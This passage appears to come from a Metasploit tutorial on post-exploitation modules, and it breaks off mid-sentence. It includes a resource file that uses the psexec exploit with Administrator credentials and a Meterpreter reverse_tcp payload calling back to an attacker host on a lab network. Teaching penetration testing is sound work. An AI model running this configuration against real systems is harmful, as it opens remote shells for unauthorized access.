Post-exploitation modules
After the evolution of the Metasploit Framework, Meterpreter scripts, which serve the purpose of automating post-exploitation tasks, were deprecated and replaced by post-exploitation modules, which provided a more stable and flexible way to automate post-exploitation tasks.
Getting ready
Because we will be focusing on post-exploitation, every recipe in this chapter will start within a remote Meterperter session.
Note
To ease the task of getting a remote session, you can use the makerc
 command within the msfconsole
 to create a resource file that will automate the exploitation of the target machine.
Take, for example, the following resource file:
root@kali:~# cat psexec.rc use exploit/windows/smb/psexec set RHOST 192.168.216.10 set SMBUSER Administrator set SMBPASS vagrant set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST 192.168.216.5 exploit
By starting the msfconsole
 with the -r
 option followed by the path of the resource file, we can get a remote session without...